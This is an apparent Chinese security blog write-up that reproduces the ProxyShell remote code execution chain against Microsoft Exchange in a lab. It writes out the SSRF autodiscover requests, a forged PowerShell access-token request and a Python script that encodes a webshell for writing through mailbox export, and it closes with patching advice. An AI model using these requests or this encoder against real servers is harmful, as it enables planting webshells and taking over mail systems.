Exchange ProxyShell 远程代码执行漏洞复现
2021-08-25 19:49:36 Author: mp.weixin.qq.com(查看原文) 阅读量:460 收藏

上方蓝色字体关注我们,一起学安全!
作者:小泫@Timeline Sec
本文字数:2923
阅读时长:8~9min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介

今年的Blackhat演讲中,Orange Tsai对其在上一阶段对Microsoft Exchange Server进行的安全研究进行了分享,除了前一段时间已经公开的proxylogon,还带来了ProxyShell等漏洞的有关具体细节。

0x02 漏洞概述

ProxyShell是利用了Exchange服务器对于路径的不准确过滤导致的路径混淆生成的SSRF,进而使攻击者通过访问PowerShell端点。而在PowerShell端点可以利用Remote PowerShell来将邮件信息打包到外部文件,而攻击者可以通过构造恶意邮件内容,利用文件写入写出webshell,从而达成命令执行。

0x03 影响版本

Microsoft Exchange Server 2010

Microsoft Exchange Server 2013

Microsoft Exchange Server 2016

Microsoft Exchange Server 2019

0x04 环境搭建

Windows Server 2012:

https://msdn.itellyou.cn/


Exchange Server 2016:

https://www.msdn.hk/html/2015/1579.html


安装教程:

https://blog.51cto.com/rdsrv/1911356

0x05 漏洞复现

1、攻击链第一步要通过SSRF

请求AutoDiscover服务,获取legacyDn

/autodiscover/autodiscover.json?a=ktacz@ygjnt.jzk/autodiscover/autodiscover.xml

POST https://192.168.114.12/autodiscover/[email protected]/autodiscover/autodiscover.xml HTTP/1.1Host: 192.168.114.12Accept-Encoding: identityCookie: Email=autodiscover/[email protected]Content-Type: text/xmlContent-Length: 316
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"><Request><EMailAddress>[email protected]</EMailAddress><AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema></Request></Autodiscover>

通过如上图

获取到LegacyDN与proxylogon类似


2、接下来我们要获取500sid的值

通过mapi/emsmdb 接口进行获取

加入如下header头body带入LegacyDN的值

X-Requesttype: ConnectX-Clientinfo: {2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}X-Clientapplication: Outlook/15.0.4815.1002X-Requestid: {C715155F-2BE8-44E0-BD34-2960067874C8}:2Content-Type: application/mapi-http

3、但是我们需要通过Powershell去进行下一步攻击

所以我们需要利用sid与username去计算CommonAccessToken,逆向推导比较复杂,exp的脚本中也给出了参考

https://github.com/dmaasland/proxyshell-poc

将生成的token通过X-CommonAccessToken进行利用
GET https://192.168.114.12/autodiscover/[email protected]/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBVhZG1pbmlzdHJhdG9yQGtkYy5jb21VLFMtMS01LTIxLTU1OTAwNjY3NC0xMjIwNDAyMjE1LTE3MzUyODY4NjEtNTAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA HTTP/1.1Host: 192.168.114.12Accept-Encoding: identityCookie: Email=autodiscover/[email protected]Content-Type: application/soap+xml;charset=UTF-8Content-Length: 0

4、通过WsMan协议,通过SOAP请求Exchange的Powershell接口发送指令  exp的作者也给出了代码

调用wsman

5、最后就是写入webshell,pst在导出时其使用的加密为类似异或加密模式,也就是说加密在加密就变成了明文,那么只要先使用其加密方法加密一遍我们要写入的webshell,就可以在导出时,获得明文,从而获取webshell

使用脚本进行webshell编码

#!/usr/bin/python#coding: UTF-8
import base64import sixfrom io import BytesIO
DWORD_SIZE = 4
mpbbCrypt = [ 65, 54, 19, 98, 168, 33, 110, 187, 244, 22, 204, 4, 127, 100, 232, 93, 30, 242, 203, 42, 116, 197, 94, 53, 210, 149, 71, 158, 150, 45, 154, 136, 76, 125, 132, 63, 219, 172, 49, 182, 72, 95, 246, 196, 216, 57, 139, 231, 35, 59, 56, 142, 200, 193, 223, 37, 177, 32, 165, 70, 96, 78, 156, 251, 170, 211, 86, 81, 69, 124, 85, 0, 7, 201, 43, 157, 133, 155, 9, 160, 143, 173, 179, 15, 99, 171, 137, 75, 215, 167, 21, 90, 113, 102, 66, 191, 38, 74, 107, 152, 250, 234, 119, 83, 178, 112, 5, 44, 253, 89, 58, 134, 126, 206, 6, 235, 130, 120, 87, 199, 141, 67, 175, 180, 28, 212, 91, 205, 226, 233, 39, 79, 195, 8, 114, 128, 207, 176, 239, 245, 40, 109, 190, 48, 77, 52, 146, 213, 14, 60, 34, 50, 229, 228, 249, 159, 194, 209, 10, 129, 18, 225, 238, 145, 131, 118, 227, 151, 230, 97, 138, 23, 121, 164, 183, 220, 144, 122, 92, 140, 2, 166, 202, 105, 222, 80, 26, 17, 147, 185, 82, 135, 88, 252, 237, 29, 55, 73, 27, 106, 224, 41, 51, 153, 189, 108, 217, 148, 243, 64, 84, 111, 240, 198, 115, 184, 214, 62, 101, 24, 68, 31, 221, 103, 16, 241, 12, 25, 236, 174, 3, 161, 20, 123, 169, 11, 255, 248, 163, 192, 162, 1, 247, 46, 188, 36, 104, 117, 13, 254, 186, 47, 181, 208, 218, 61, 20, 83, 15, 86, 179, 200, 122, 156, 235, 101, 72, 23, 22, 21, 159, 2, 204, 84, 124, 131, 0, 13, 12, 11, 162, 98, 168, 118, 219, 217, 237, 199, 197, 164, 220, 172, 133, 116, 214, 208, 167, 155, 174, 154, 150, 113, 102, 195, 99, 153, 184, 221, 115, 146, 142, 132, 125, 165, 94, 209, 93, 147, 177, 87, 81, 80, 128, 137, 82, 148, 79, 78, 10, 107, 188, 141, 127, 110, 71, 70, 65, 64, 68, 1, 17, 203, 3, 63, 247, 244, 225, 169, 143, 60, 58, 249, 251, 240, 25, 48, 130, 9, 46, 201, 157, 160, 134, 73, 238, 111, 77, 109, 196, 45, 129, 52, 37, 135, 27, 136, 170, 252, 6, 161, 18, 56, 253, 76, 66, 114, 100, 19, 55, 36, 106, 117, 119, 67, 255, 230, 180, 75, 54, 92, 228, 216, 53, 61, 69, 185, 44, 236, 183, 49, 43, 41, 7, 104, 163, 14, 105, 123, 24, 158, 33, 57, 190, 40, 26, 91, 120, 245, 35, 202, 42, 176, 175, 62, 254, 4, 140, 231, 229, 152, 50, 149, 211, 246, 74, 232, 166, 234, 233, 243, 213, 47, 112, 32, 242, 31, 5, 103, 173, 85, 16, 206, 205, 227, 39, 59, 218, 186, 215, 194, 38, 212, 145, 29, 210, 28, 34, 51, 248, 250, 241, 90, 239, 207, 144, 182, 139, 181, 189, 192, 191, 8, 151, 30, 108, 226, 97, 224, 198, 193, 89, 171, 187, 88, 222, 95, 223, 96, 121, 126, 178, 138, 71, 241, 180, 230, 11, 106, 114, 72, 133, 78, 158, 235, 226, 248, 148, 83, 224, 187, 160, 2, 232, 90, 9, 171, 219, 227, 186, 198, 124, 195, 16, 221, 57, 5, 150, 48, 245, 55, 96, 130, 140, 201, 19, 74, 107, 29, 243, 251, 143, 38, 151, 202, 145, 23, 1, 196, 50, 45, 110, 49, 149, 255, 217, 35, 209, 0, 94, 121, 220, 68, 59, 26, 40, 197, 97, 87, 32, 144, 61, 131, 185, 67, 190, 103, 210, 70, 66, 118, 192, 109, 91, 126, 178, 15, 22, 41, 60, 169, 3, 84, 13, 218, 93, 223, 246, 183, 199, 98, 205, 141, 6, 211, 105, 92, 134, 214, 20, 247, 165, 102, 117, 172, 177, 233, 69, 33, 112, 12, 135, 159, 116, 164, 34, 76, 111, 191, 31, 86, 170, 46, 179, 120, 51, 80, 176, 163, 146, 188, 207, 25, 28, 167, 99, 203, 30, 77, 62, 75, 27, 155, 79, 231, 240, 238, 173, 58, 181, 89, 4, 234, 64, 85, 37, 81, 229, 122, 137, 56, 104, 82, 123, 252, 39, 174, 215, 189, 250, 7, 244, 204, 142, 95, 239, 53, 156, 132, 43, 21, 213, 119, 52, 73, 182, 18, 10, 127, 113, 136, 253, 157, 24, 65, 125, 147, 216, 88, 44, 206, 254, 36, 175, 222, 184, 54, 200, 161, 128, 166, 153, 152, 168, 47, 14, 129, 101, 115, 228, 194, 162, 138, 212, 225, 17, 208, 8, 139, 42, 242, 237, 154, 100, 63, 193, 108, 249, 236]
mpbbR = mpbbCryptmpbbS = mpbbCrypt[256:]mpbbI = mpbbCrypt[512:]

def cryptpermute(data, encrypt=False): table = mpbbR if encrypt else mpbbI tmp = [table[v] for v in data] if six.PY3 else [table[ord(v)] for v in data] i = 0 buf = bytes(tmp) if six.PY3 else bytearray(tmp) stream = BytesIO(buf) while True: b = stream.read(DWORD_SIZE) try: tmp[i] = b[0] tmp[i + 1] = b[1] tmp[i + 2] = b[2] tmp[i + 3] = b[3] i += DWORD_SIZE except: pass if len(b) != DWORD_SIZE: break
return bytes(tmp) if six.PY3 else ''.join(tmp)
if __name__ == "__main__": webshell = b"d" v1 = cryptpermute(webshell, False) b64_data = base64.b64encode(v1).decode() print("[+] Encode webshell ⬇\n{}\n".format(b64_data))
encode_shell = base64.b64decode(b64_data) decode_shell = cryptpermute(encode_shell, True) print("[+] Decode webshell ⬇\n{}\n".format(decode_shell.decode()))

content下内容为shell编码后再进行base64的内容

再后续导出将会还原为原内容

执行 保存邮件草稿请求 导出写shell

查看文件

0x06 修复方式

微软已发布上述3个高危漏洞的安全补丁,腾讯安全专家建议采用Exchange Server 的用户尽快升级修复。

参考链接:

https://github.com/dmaasland/proxyshell-poc

https://mp.weixin.qq.com/s/aEnoBvibp-gkt3qtcOXqAw

https://mp.weixin.qq.com/s/-qJh2u0mbrKWxWNCZgOr


文章来源: http://mp.weixin.qq.com/s?__biz=MzI0Nzc0NTcwOQ==&mid=2247484982&idx=1&sn=01fadc122229097e1ec76215a61cbedc&chksm=e9aa1bf4dedd92e250f2ee70fce067903380c845b3ef17a70ffc4c9b12e23e093e3d8a340424#rd
如有侵权请联系:admin#unsafe.sh